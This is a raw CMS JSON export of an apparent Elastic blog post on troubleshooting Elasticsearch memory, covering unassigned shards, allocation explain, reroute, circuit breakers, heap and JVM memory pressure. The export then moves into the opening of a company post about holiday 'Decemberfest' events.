0\n}","_metadata":{"uid":"cs722f975aa1ac1b16"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs47238668db1c604d"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIf any shards report \u0026gt;0 outside \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eactive_shards\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e or \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eactive_primary_shards\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, you’ve pinpointed a cause for performance issues.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eMost commonly if this reports an issue, it will be \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eunassigned_shards\u0026gt;0\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. If these shards are primary, your cluster will report as \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003estatus:red\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, and if only replicas, it will report as \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003estatus:yellow\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. (This is why \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/index-modules.html#dynamic-index-settings\"\u003e\u003cspan style='font-size: 12pt;'\u003esetting replicas on indices\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e is important — if the cluster encounters an issue, it can recover rather than experience data loss.)Let’s pretend we have a \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003estatus:yellow\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e with a single unassigned shard. To investigate, we’d take a look at which index shard is having trouble via \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/cat-shards.html\"\u003e\u003cspan style='font-size: 12pt;'\u003e_cat/shards\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csdf67115e87eda65f"}}},{"code":{"code":"GET _cat/shards?v=true\u0026s=state\nindex \tshard prirep state \tdocs store ip \tnode\nlogs \t0 \tp \tSTARTED \t2 10.1kb 10.42.255.40 instance-0000000001\nlogs \t0 \tr \tUNASSIGNED\nkibana_sample_data_logs \t0 \tp \tSTARTED \t14074 10.6mb 10.42.255.40 instance-0000000001\n.kibana_1 \t0 \tp \tSTARTED \t2261 3.8mb 10.42.255.40 instance-0000000001","_metadata":{"uid":"cs84e42325ae42db40"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csca5d90f4a5828a1f"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eSo this will be for our non-system index logs, which have an unassigned replica shard. Let’s see what’s giving it grief by running \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/7.12/cluster-allocation-explain.html\"\u003e\u003cspan style='font-size: 12pt;'\u003e_cluster/allocation/explain\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. (Pro tip: When you escalate to support, this is \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eexactly\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e what we do.)\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003e\u003cstrong\u003eGET _cluster/allocation/explain?pretty\u0026amp;filter_path=index,node_allocation_decisions.node_name,node_allocation_decisions.deciders.*\u003c/strong\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e \u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs65ac3aef7b729bff"}}},{"code":{"code":"{ \"index\": \"logs\",\n \"node_allocation_decisions\": [{\n \"node_name\": \"instance-0000000005\",\n \"deciders\": [{\n \"decider\": \"data_tier\",\n \"decision\": \"NO\",\n \"explanation\": \"node does not match any index setting [index.routing.allocation.include._tier] tier filters [data_hot]\"\n}]}]}","_metadata":{"uid":"cscd314239f3b38b03"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csa11d35edc31eb51d"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThis error message points to \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003edata_hot\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, which is part of an \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/index-lifecycle-management.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eindex lifecycle management\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e (ILM) policy and indicates that our ILM policy is incongruent with our current index settings. In this case, the cause of this error is from setting up a hot-warm ILM policy without having designated hot-warm nodes. (I needed to guarantee something would fail, so this is me forcing error examples for y’all. For more information, see \u003c/span\u003e\u003ca href=\"https://www.youtube.com/watch?v=5z3n2VgusLE\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003ethis example troubleshooting video\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e for resolution walkthrough.)\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIf you run this command when you don’t have any unassigned shards, you’ll get a 400 error saying \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eunable to find any unassigned shards to explain\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e because nothing’s wrong to report on\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003e.\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eIf you get a non-logic cause (e.g., a temporary network error like \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003enode left cluster during allocation\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e), then you can use Elastic’s handy-dandy \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/cluster-reroute.html\"\u003e\u003cspan style='font-size: 12pt;'\u003e_cluster/reroute\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs4cd3226d26e7e91e"}}},{"code":{"code":"POST /_cluster/reroute","_metadata":{"uid":"cs5b9f4c3fa34d1459"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs99c4e50e27efe068"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThis request without customizations starts an asynchronous background process that attempts to allocate all current \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003estate:UNASSIGNED\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e shards. (Don’t be like me and not wait for it to finish before you contact dev, because I thought it would be instantaneous and coincidentally escalate just in time for them to say nothing’s wrong because nothing was anymore.) For more information, see this \u003c/span\u003e\u003ca href=\"https://www.youtube.com/watch?v=v2mbeSd1vTQ\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003etroubleshooting video for monitoring Allocation Health\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Circuit breakers","_metadata":{"uid":"csac7cc6875626f46c"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eMaxing out your heap allocation can cause requests to your cluster to time out or error and frequently will cause your cluster to experience circuit breaker exceptions. \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/circuit-breaker-errors.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eCircuit breaking errors\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e causes elasticsearch.log events like:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csa6123b2fe5541ffc"}}},{"code":{"code":"Caused by: org.elasticsearch.common.breaker.CircuitBreakingException: [parent] Data too large, data for [\u003ctransport_request\u003e] would be [num/numGB], which is larger than the limit of [num/numGB], usages [request=0/0b, fielddata=num/numKB, in_flight_requests=num/numGB, accounting=num/numGB]","_metadata":{"uid":"csf328c98fcbe15688"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs9b748bf9e85a9c6a"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eTo investigate, take a look at your \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eheap.percent\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, either by looking at \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/cat-nodes.html\"\u003e\u003cspan style='font-size: 12pt;'\u003e_cat/nodes\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csc0ddb373e182df0d"}}},{"code":{"code":"GET /_cat/nodes?v=true\u0026h=name,node*,heap*\n# heap = JVM (logical memory reserved for heap)\n# ram = physical memory\n\nname node.role heap.current heap.percent heap.max\ntiebreaker-0000000002 mv 119.8mb 23 508mb\ninstance-0000000001 himrst 1.8gb 48 3.9gb\ninstance-0000000000 himrst 2.8gb 73 3.9gb","_metadata":{"uid":"cs9759079a5c9a1d05"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs43d6daa2b506e8ec"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOr if you’ve previously enabled it, navigate to Kibana \u0026gt; \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/kibana/current/xpack-monitoring.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eStack Monitoring\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cse328c6f3be61bb8a"}}},{"image":{"image":{"uid":"bltaf9ad3a2547c12d3","_version":1,"title":"blog-elasticsearch-nodes.png","created_by":"bltd9765be97bbed20c","updated_by":"bltd9765be97bbed20c","created_at":"2024-11-05T14:47:17.903Z","updated_at":"2024-11-05T14:47:17.903Z","content_type":"image/png","file_size":"235581","filename":"blog-elasticsearch-nodes.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-05T15:06:14.577Z","user":"bltd9765be97bbed20c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltaf9ad3a2547c12d3/672a2ff510ff855dc625ebea/blog-elasticsearch-nodes.png"},"_metadata":{"uid":"cs14509603c7e1b0b9"},"caption_l10n":"","alt_text_l10n":"elasticsearch nodes","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs4e4577eca5d5bc3c"},"header_style":"H2","paragraph_l10n":"\u003cp\u003eIf you've confirmed you're hitting your memory circuit breakers, you'll want to consider increasing heap temporarily to give yourself breathing room to investigate. When investigating root cause, look through your \u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/enable-audit-logging.html\" target=\"_self\"\u003eaudit logging\u003c/a\u003e, \u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/master/index-modules-slowlog.html\" target=\"_self\"\u003eslow logging\u003c/a\u003e, \u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/logging.html\" target=\"_self\"\u003eclusterlogs,\u003c/a\u003e or elasticsearch.log for the preceding consecutive events. You'll be looking for:\u003c/p\u003e\u003cul\u003e\u003cli\u003eExpensive queries, especially:\u003cul\u003e\u003cli\u003eHigh bucket aggregations\u003cul\u003e\u003cli\u003eI felt so silly when I found out that searches temporarily allocate a certain portion of your heap \u003cem\u003ebefore\u003c/em\u003e they run the query based on the search \u003cem\u003esize\u003c/em\u003e or bucket dimensions, so setting 10,000,000 really was giving my ops team heartburn.\u003c/li\u003e\u003c/ul\u003e\u003c/li\u003e\u003cli\u003enon-optimized mappings\u003cul\u003e\u003cli\u003eThe second reason to feel silly was when I thought doing hierarchical reporting would search better than flattened out data (it does not).\u003c/li\u003e\u003c/ul\u003e\u003c/li\u003e\u003c/ul\u003e\u003c/li\u003e\u003cli\u003eRequest volume/pace: Usually batch or async queries\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Time to scale","_metadata":{"uid":"cs72cf02f7ec1a4126"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIf this isn’t your first time hitting circuit breakers or you suspect it’ll be an ongoing issue (e.g., consistently hitting 85%, so it’s time to look at scaling resources), you’ll want to take a closer look at \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/found-understanding-memory-pressure-indicator\"\u003e\u003cspan style='font-size: 12pt;'\u003ethe JVM Memory Pressure\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e as your long-term heap indicator. \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/cloud/current/ec-memory-pressure.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eYou can check this\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e in Elastic Cloud Hosted \u0026gt; Deployment.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs7018b9cbeb694290"}}},{"image":{"image":{"uid":"bltec76d550fd75d35e","_version":1,"title":"blog-elasticsearch-instances.png","created_by":"bltd9765be97bbed20c","updated_by":"bltd9765be97bbed20c","created_at":"2024-11-05T14:47:40.198Z","updated_at":"2024-11-05T14:47:40.198Z","content_type":"image/png","file_size":"216097","filename":"blog-elasticsearch-instances.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-05T15:06:14.556Z","user":"bltd9765be97bbed20c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltec76d550fd75d35e/672a300cec690346cf80e426/blog-elasticsearch-instances.png"},"_metadata":{"uid":"csb75de8bf4d1709e5"},"caption_l10n":"","alt_text_l10n":"elasticsearch instances","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csf716fd6b8c98aa10"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOr you can calculate it from \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/cluster-nodes-stats.html\"\u003e\u003cspan style='font-size: 12pt;'\u003e_nodes/stats\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csc93cc273ccc95595"}}},{"code":{"code":"GET /_nodes/stats?filter_path=nodes.*.jvm.mem.pools.old\n\n{\"nodes\": { \"node_id\": { \"jvm\": { \"mem\": { \"pools\": { \"old\": {\n \"max_in_bytes\": 532676608,\n \"peak_max_in_bytes\": 532676608,\n \"peak_used_in_bytes\": 104465408,\n \"used_in_bytes\": 104465408\n}}}}}}}","_metadata":{"uid":"csb712d2db038a6552"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs545ca4bd1034b922"},"header_style":"H2","paragraph_l10n":"\u003cp\u003eWhere:\u003c/p\u003e"}],"_metadata":{"uid":"cs642a356c6aa18794"}}},{"code":{"code":"JVM Memory Pressure = used_in_bytes / max_in_bytes","_metadata":{"uid":"csd2dd7d82cab97b76"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs7a8edb0eb547da34"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eA potential symptom of this is high frequency and long duration from garbage collector (gc) events in your elasticsearch.log:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs3e7a869654542ce1"}}},{"code":{"code":"[timestamp_short_interval_from_last][INFO ][o.e.m.j.JvmGcMonitorService] [node_id] [gc][number] overhead, spent [21s] collecting in the last [40s]","_metadata":{"uid":"cs645946facbfa844c"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs8c029cedd156f990"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eIf you confirm this scenario, you’ll need to take a look either at scaling your cluster or at reducing the demands hitting it. You’ll want to investigate/consider:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003eIncreasing heap resources (heap/node; number of nodes)\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003eDecreasing shards (delete unnecessary/old data; \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/getting-started-index-lifecycle-management.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003euse ILM\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e to put data into \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/hot-warm-architecture\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ewarm/cold storage\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e so you can \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/ilm-shrink.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eshrink it\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e; turn off replicas for data you don’t care if you lose)\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"We're here to help","_metadata":{"uid":"cs2c3078cac9273079"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWooh! From what I see in Elastic support, that’s the rundown of most common user tickets: unassigned shards, unbalanced shard-heap, circuit breakers, high garbage collection, and allocation errors. All are symptoms of the core resource allocation management conversation. Hopefully, you now know the theory and resolution steps, too.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAt this point, though, if you’re stuck resolving an issue, feel free to reach out. We’re here and happy to help! Contact us:\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003ca href=\"http://discuss.elastic.co/\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003c/span\u003eElastic Discuss\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u0026nbsp;\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://join.slack.com/t/elasticstack/shared_invite/zt-o4sdlhb7-OGXEcy4iry_CsxVyJLGYag\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003c/span\u003eElastic community Slack\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/consulting\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic consulting\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/training\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic training\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/support\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic support\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eCheers to our ability to self-manage the Elastic Stack’s resource allocation as non-Ops (love Ops, too)!\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003e\u003c/em\u003e\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003cem\u003e\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs2b374506db2111d2"}}},{"callout":{"title_l10n":"Additional resources:","_metadata":{"uid":"cs8dad7e458d5e92c8"},"paragraph_l10n":"\u003cul\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eDocs: \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/cloud/current/ec-monitoring-setup.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eHow to set up monitoring\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003c/ul\u003e\u003cul\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003eBlog: \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/how-to-set-up-elastic-cloud-advice-from-elastic-support\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eHow to set up Elastic Cloud: Advice from Elastic support\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003c/ul\u003e","callout_reference":[],"callout_type":"Information (info)"}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csf3986fc457801d5d"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cem\u003eOriginally published April 27, 2021; updated November 5, 2024.\u003c/em\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csb8fdc17e83ea105f"}}}],"publish_date":"2024-11-05T16:00:00.000Z","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt3d820a0eae1c9158","ACL":{},"created_at":"2020-06-17T03:35:53.368Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2020-06-17T03:35:53.368Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.290Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt8b37b4b3ec0fe838","ACL":{},"created_at":"2020-06-17T03:36:06.107Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"kibana","label_l10n":"Kibana","tags":[],"title":"Kibana","updated_at":"2020-06-17T03:36:06.107Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.315Z","user":"blt4b2e1169881270a8"}}],"tags_industry":[],"tags_partner":[],"tags_topic":[],"tags_use_case":[],"thumbnail_image":{"uid":"bltc65e91f68e28d7dc","_version":1,"title":"Office-building (4).jpg","created_by":"bltd9765be97bbed20c","updated_by":"bltd9765be97bbed20c","created_at":"2024-11-04T16:58:32.748Z","updated_at":"2024-11-04T16:58:32.748Z","content_type":"image/jpeg","file_size":"127924","filename":"Office-building_(4).jpg","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-05T15:06:14.539Z","user":"bltd9765be97bbed20c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc65e91f68e28d7dc/6728fd38e404ee40f9f6c79a/Office-building_(4).jpg"},"title":"Managing and troubleshooting Elasticsearch memory","title_l10n":"Managing and troubleshooting Elasticsearch memory","updated_at":"2024-12-16T15:15:19.108Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/managing-and-troubleshooting-elasticsearch-memory","publish_details":{"time":"2024-12-16T15:15:25.921Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt00cbd0f80522e6fb","_version":9,"locale":"en-us","ACL":{},"abstract_l10n":"Take a peek at how Elasticians around the world are celebrating the holiday season during Decemberfest.","author":["blt7fc3768df8cad1f6"],"category":["bltc253e0851420b088"],"created_at":"2023-12-14T22:12:25.958Z","created_by":"blte369ea3bcd6ac892","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csda328789e07fae6a"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eDecember is here and that means holiday celebrations. At Elastic, we call the season’s celebration Decemberfest. It’s a time for all Elasticians to connect, give back, or get decked out in our custom swag.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/blog/culture-life-at-elastic-decemberfest-for-the-holidays\"\u003e\u003cspan style='font-size: 12pt;'\u003eDecemberfest started in 2020\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e when the world had to be 100% virtual and has evolved into our flagship holiday celebration running from the end of November to mid-December.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe’ve always been distributed by design. To uphold that ethos and allow everyone to join the festivities, we have many ways for our Elasticians to celebrate the season. This year, Elasticians have three options to choose from.\u003cbr /\u003e\u003cbr /\u003e\u003c/span\u003e\u003c/p\u003e\u003col\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eIn-office events:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e In-person events are organized in 12 cities with Elastic offices around the world — the offices are decorated for the holidays, allowing Elasticians to celebrate and mingle in person.\u0026nbsp;\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eCluster-team events:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e For those who don’t live near an Elastic office but do live near other Elasticians, cluster teams have put together their own celebrations specific to their region and interests. For example, a cluster in Phoenix, AZ, is hosting a team lunch at a local restaurant, while one in the Netherlands is organizing a Dutch gift swap with a small poem “Sinterklaasgedicht.”\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSwag bags: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eWe’d never leave out those who \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/culture-create-engaging-employee-events\"\u003e\u003cspan style='font-size: 12pt;'\u003ecan’t join us IRL\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. Those who aren’t in close proximity to an in-person event can choose to receive sustainably sourced Elastic swag from the Decemberfest gift shop or 100 Benevity bucks to donate to the charity of their choosing on \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/culture-giving-tuesday\"\u003e\u003cspan style='font-size: 12pt;'\u003eGiving Tuesday\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003cbr /\u003e\u003cbr /\u003e\u003cbr /\u003e\u003c/span\u003e\u003c/li\u003e\u003c/ol\u003e"}],"_metadata":{"uid":"cs23357be57279f59f"}}},{"image":{"image":{"uid":"bltb96aeb9a4d734b94","_version":1,"is_dir":false,"ACL":{},"content_type":"image/jpeg","created_at":"2024-12-12T00:52:03.347Z","created_by":"blte369ea3bcd6ac892","file_size":"1315802","filename":"Arlingtonoffice2.jpg","parent_uid":null,"tags":[],"title":"Arlingtonoffice2.jpg","updated_at":"2024-12-12T00:52:03.347Z","updated_by":"blte369ea3bcd6ac892","publish_details":{"time":"2024-12-12T15:00:01.827Z","user":"blte369ea3bcd6ac892","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltb96aeb9a4d734b94/675a33b3f5804ac0e6db36ed/Arlingtonoffice2.jpg"},"_metadata":{"uid":"csebe4bfb659df8960"},"caption_l10n":"Arlington, VA, USA","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":"width-large: 